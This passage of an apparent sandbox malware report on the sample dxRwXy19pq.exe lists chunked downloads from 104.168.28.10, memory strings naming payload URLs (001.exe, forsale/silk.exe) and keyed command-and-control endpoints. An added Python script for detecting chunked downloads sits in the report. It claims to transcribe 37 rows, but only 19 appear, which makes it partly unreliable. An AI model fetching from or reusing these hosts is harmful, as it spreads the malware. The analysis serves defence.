            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=917504-1048575User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1441792-1572863User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1572864-1703935User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1703936-1835007User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1835008-1966079User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1966080-2228223User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=2228224-2490367User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=2752512-3014655User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=2490368-2752511User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=3014656-3276799User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=3276800-3538943User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=3538944-3801087User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=3801088-4063231User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=4063232-4587519User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=4587520-5111807User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=5111808-5636095User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=5636096-6160383User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=6160384-6684671User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=6684672-6763823User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
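The range requests above are the trace a chunked payload fetch leaves in a proxy log. The following script is an added example (it is not part of the Joe Sandbox report and not code from the sample) that parses rows in the flattened one-line form the page prints, checks whether the ranges are contiguous once sorted, derives the chunk-size schedule, and flags any (host, path, User-Agent) group with many Range requests. The 37 byte ranges are transcribed from the rows above; `make_row` is this example's own helper that rebuilds a report row for a range, and the `min_requests` threshold is an assumption.

```python
"""Check how /data/001 was fetched from the Range requests listed above.
Added example, not part of the Joe Sandbox report.  The 37 byte ranges are
transcribed from the report rows; make_row() reproduces the flattened
one-line format in which the page prints each request."""
import re
from itertools import groupby

HOST, PATH = "104.168.28.10", "/data/001"
UA = ("Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36")

# (start, end) of every Range header, in the order the report lists them.
RANGES = [
    (163840, 196607), (196608, 229375), (229376, 262143), (262144, 294911),
    (294912, 327679), (327680, 360447), (360448, 393215), (393216, 458751),
    (458752, 524287), (524288, 589823), (589824, 655359), (655360, 720895),
    (720896, 786431), (786432, 851967), (851968, 917503), (1048576, 1179647),
    (1179648, 1310719), (1310720, 1441791), (917504, 1048575), (1441792, 1572863),
    (1572864, 1703935), (1703936, 1835007), (1835008, 1966079), (1966080, 2228223),
    (2228224, 2490367), (2752512, 3014655), (2490368, 2752511), (3014656, 3276799),
    (3276800, 3538943), (3538944, 3801087), (3801088, 4063231), (4063232, 4587519),
    (4587520, 5111807), (5111808, 5636095), (5636096, 6160383), (6160384, 6684671),
    (6684672, 6763823),
]

# One row copied verbatim from the report, to prove the parser matches its format.
RAW_ROW = ("Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1"
           "Host: 104.168.28.10Range: bytes=1048576-1179647User-Agent: " + UA + "Accept: */*")

# Header separators were lost in extraction, so whitespace between fields is optional.
ROW_RE = re.compile(
    r"GET (?P<path>\S+) HTTP/1\.[01]\s*Host: (?P<host>\S+?)\s*Range: bytes=(?P<start>\d+)-(?P<end>\d+)"
    r"\s*User-Agent: (?P<ua>.+?)\s*Accept: "
)


def make_row(start, end):
    """Rebuild a report row for one range (constructed, same layout as RAW_ROW)."""
    return (f"Source: global trafficHTTP traffic detected: GET {PATH} HTTP/1.1Host: {HOST}"
            f"Range: bytes={start}-{end}User-Agent: {UA}Accept: */*")


def parse_row(row):
    m = ROW_RE.search(row)
    if not m:
        raise ValueError("not a Range-request row: " + row[:60])
    return {"host": m["host"], "path": m["path"], "ua": m["ua"],
            "start": int(m["start"]), "end": int(m["end"])}


def analyse(ranges):
    """Coverage and chunk schedule of (start, end) ranges given in observed order."""
    ordered = sorted(ranges)
    gaps, overlaps = [], []
    for (_, e1), (s2, _) in zip(ordered, ordered[1:]):
        if s2 > e1 + 1:
            gaps.append((e1 + 1, s2 - 1))
        elif s2 <= e1:
            overlaps.append((s2, e1))
    # A request whose start is below the previous request's start was issued out of order.
    out_of_order = sum(s2 < s1 for (s1, _), (s2, _) in zip(ranges, ranges[1:]))
    sizes = [e - s + 1 for s, e in ordered]
    return {
        "requests": len(ranges),
        "first_byte": ordered[0][0],
        "last_byte": ordered[-1][1],
        "bytes_covered": sum(sizes),
        "contiguous": not gaps and not overlaps,
        "gaps": gaps,
        "overlaps": overlaps,
        "out_of_order": out_of_order,
        "chunk_schedule": [(size, len(list(g))) for size, g in groupby(sizes)],
    }


def flag_chunked_downloads(rows, min_requests=8):
    """Group parsed rows by (host, path, User-Agent); return the analysis of every group
    with at least min_requests Range requests (threshold is an assumption)."""
    groups = {}
    for r in rows:
        groups.setdefault((r["host"], r["path"], r["ua"]), []).append((r["start"], r["end"]))
    return {key: analyse(v) for key, v in groups.items() if len(v) >= min_requests}


if __name__ == "__main__":
    report = flag_chunked_downloads([parse_row(make_row(s, e)) for s, e in RANGES])
    for (host, path, ua), info in report.items():
        print(host + path, info["requests"], "requests,", info["bytes_covered"], "bytes,",
              "contiguous" if info["contiguous"] else "gaps", info["chunk_schedule"])
```

Run against the 37 rows, the group for 104.168.28.10/data/001 comes back contiguous, with two out-of-order requests and the schedule 7x32 KiB, 8x64 KiB, 8x128 KiB, 8x256 KiB, 5x512 KiB and a final 79152-byte chunk. The same grouping over a real proxy log would need the client address added to the key; the report does not record it.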
Source: dxRwXy19pq.exe, 00000000.00000003.1251275002.000000000099A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/
Source: dxRwXy19pq.exe, 00000000.00000003.1251221468.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000002.1330110847.00000000009E9000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325826877.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000002.1329690594.000000000097C000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1251275002.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1251275002.000000000099A000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.00000000009E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001.exe
Source: dxRwXy19pq.exe, 00000000.00000003.1251221468.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001.exe.dll
Source: dxRwXy19pq.exe, 00000000.00000003.1251221468.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001.exe8
Source: dxRwXy19pq.exe, 00000000.00000002.1329690594.000000000097C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001.exe;
Source: dxRwXy19pq.exe, 00000000.00000003.1251221468.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001.exeLMEM
Source: dxRwXy19pq.exe, 00000000.00000003.1251275002.000000000099A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001.exeSSC:
Source: dxRwXy19pq.exe, 00000000.00000003.1251221468.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001.exeT
Source: dxRwXy19pq.exe, 00000000.00000003.1251221468.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001.exedll
Source: dxRwXy19pq.exe, 00000000.00000003.1251275002.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001.exefC:
Source: dxRwXy19pq.exe, 00000000.00000003.1251275002.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001.exelliJ
Source: dxRwXy19pq.exe, 00000000.00000002.1329690594.000000000097C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001.exem
Source: dxRwXy19pq.exe, 00000000.00000003.1251275002.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001.exeum
Source: dxRwXy19pq.exe, 00000000.00000003.1251221468.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000002.1330110847.00000000009E9000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325826877.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.00000000009E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001.exe~
Source: vbc.exe, 00000005.00000002.1380145477.000001798DB5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/data/001
Source: vbc.exe, 00000005.00000002.1379431618.000001798D763000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/data/001PCUSERD
Source: vbc.exe, 00000005.00000002.1380019063.000001798DB40000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.1380145477.000001798DB5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/data/001w
Source: vbc.exe, 00000005.00000002.1380145477.000001798DB5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/data/001wl
Source: vbc.exe, 00000005.00000002.1380145477.000001798DB5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/data/001wv
Source: vbc.exe, 00000005.00000002.1380145477.000001798DB5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/data/001x
Source: powershell.exe, 0000000F.00000002.1552405533.000002785CAC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000A.00000002.1483393077.000002AE4A8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1529410239.00000278543D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000F.00000002.1408831814.0000027844588000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.1396249089.000002AE3AA79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1408831814.0000027844588000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000A.00000002.1396249089.000002AE3A851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1408831814.0000027844361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.1396249089.000002AE3AA79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1408831814.0000027844588000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000F.00000002.1408831814.0000027844588000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 00000003.00000002.1403301941.000001F079213000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, 0000000D.00000000.1330730018.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, is-PDB6I.tmp.13.dr | String found in binary or memory: http://www.innosetup.com/
Source: 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe, 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe, 0000000C.00000002.2470583560.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, silk[1].exe.0.dr | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe, 0000000C.00000002.2470583560.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, silk[1].exe.0.dr | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: powershell.exe, 0000000A.00000002.1510644374.000002AE52BB0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe, 0000000C.00000003.1330018876.0000000002198000.00000004.00001000.00020000.00000000.sdmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe, 0000000C.00000003.1329705673.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, 0000000D.00000000.1330730018.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, is-PDB6I.tmp.13.dr | String found in binary or memory: http://www.remobjects.com/ps
Source: 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe, 0000000C.00000003.1330018876.0000000002198000.00000004.00001000.00020000.00000000.sdmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe, 0000000C.00000003.1329705673.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, 0000000D.00000000.1330730018.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, is-PDB6I.tmp.13.dr | String found in binary or memory: http://www.remobjects.com/psU
Source: powershell.exe, 0000000A.00000002.1511083420.000002AE52D5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://.AppV.ources
Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2472959823.0000000003406000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/
Source: photorecoverylib59.exe, 0000000E.00000002.2472959823.0000000003406000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/A
Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/P
Source: photorecoverylib59.exe, 0000000E.00000002.2472959823.0000000003440000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb386926d19fe6595cd66946951e91fcd85250
Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb387926d19fe6595cd66946951e91fcd85250
Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2472959823.00000000033FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb388926d19fe6595cd66946951e91fcd85250
Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb389926d19fe6595cd66946951e91fcd85250
Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb38a926d19fe6595cd66946951e91fcd85250
Source: photorecoverylib59.exe, 0000000E.00000002.2472959823.0000000003443000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2472959823.0000000003406000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb38b926d19fe6595cd66946951e91fcd85250
Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb38c926d19fe6595cd66946951e91fcd85250
Source: photorecoverylib59.exe, 0000000E.00000002.2472959823.0000000003406000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb38d926d19fe6595cd66946951e91fcd85250
Source: photorecoverylib59.exe, 0000000E.00000002.2472959823.000000000345C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb38f802a1cec7a86d87bdb6546ad12dac0290
Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2472959823.000000000345C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb38f812a1cec7a86d87bdb6546ad12dac0290
Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000B83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb38f822a1cec7a86d87bdb6546ad12dac0290
Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000B83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb38f832a1cec7a86d87bdb6546ad12dac0290
Source: photorecoverylib59.exe, 0000000E.00000002.2472959823.0000000003440000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb38f842a1cec7a86d87bdb6546ad12dac0290
Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib59.exe, 0000000E.00000002.2472959823.00000000033FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb38f852a1cec7a86d87bdb6546ad12dac0290
Source: photorecoverylib59.exe, 0000000E.00000002.2472959823.00000000033FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb38f862a1cec7a86d87bdb6546ad12dac0290
Source: photorecoverylib59.exe, 0000000E.00000002.2472959823.00000000033FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb38f872a1cec7a86d87bdb6546ad12dac0290
Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae14615677411efa3231678fbb38f926d19fe6595cd66946851e91fcd85241
Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/en-GB
Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/en-US
Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/priseCertificates
Source: photorecoverylib59.exe, 0000000E.00000002.2471569006.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://176.113.115.96/rosoft
Source: dxRwXy19pq.exe, 00000000.00000002.1330110847.00000000009E9000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325826877.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.00000000009E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://91.240.118.49/
Source: dxRwXy19pq.exe, 00000000.00000002.1330110847.00000000009E9000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325826877.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.00000000009E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://91.240.118.49/Fy
Source: dxRwXy19pq.exe, 00000000.00000003.1325685373.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://91.240.118.49/forsale/silk.exe
Source: dxRwXy19pq.exe, 00000000.00000003.1325515824.0000000000A16000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000002.1330305178.0000000000A21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://91.240.118.49/forsale/silk.exe/
Source: dxRwXy19pq.exe, 00000000.00000003.1325515824.0000000000A62000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000002.1330305178.0000000000A62000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://91.240.118.49/forsale/silk.exeLMEMP
Source: dxRwXy19pq.exe, 00000000.00000002.1329906446.000000000099B000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.000000000099A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://91.240.118.49/forsale/silk.exeTTC:
Source: dxRwXy19pq.exe, 00000000.00000002.1330110847.00000000009E9000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325826877.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.00000000009E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://91.240.118.49/forsale/silk.exeb
Source: dxRwXy19pq.exe, 00000000.00000003.1325515824.0000000000A16000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000002.1330305178.0000000000A21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://91.240.118.49/forsale/silk.exel0
Source: dxRwXy19pq.exe, 00000000.00000002.1330110847.00000000009E9000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325826877.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, dxRwXy19pq.exe, 00000000.00000003.1325685373.00000000009E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://91.240.118.49/forsale/silk.exeui
Source: powershell.exe, 0000000A.00000002.1396249089.000002AE3A851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1408831814.0000027844361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: powershell.exe, 0000000F.00000002.1529410239.00000278543D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.1529410239.00000278543D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.1529410239.00000278543D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: vbc.exe, 00000005.00000002.1371160311.000000014007F000.00000002.00000400.00020000.00000000.sdmp | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000003.00000002.1403687928.000001F079263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402159867.000001F07925A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1403780116.000001F079281000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000003.00000002.1403780116.000001F079281000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000003.00000002.1403622955.000001F079258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1402409486.000001F079257000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000003.00000002.1403724935.000001F079268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1400969047.000001F079267000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
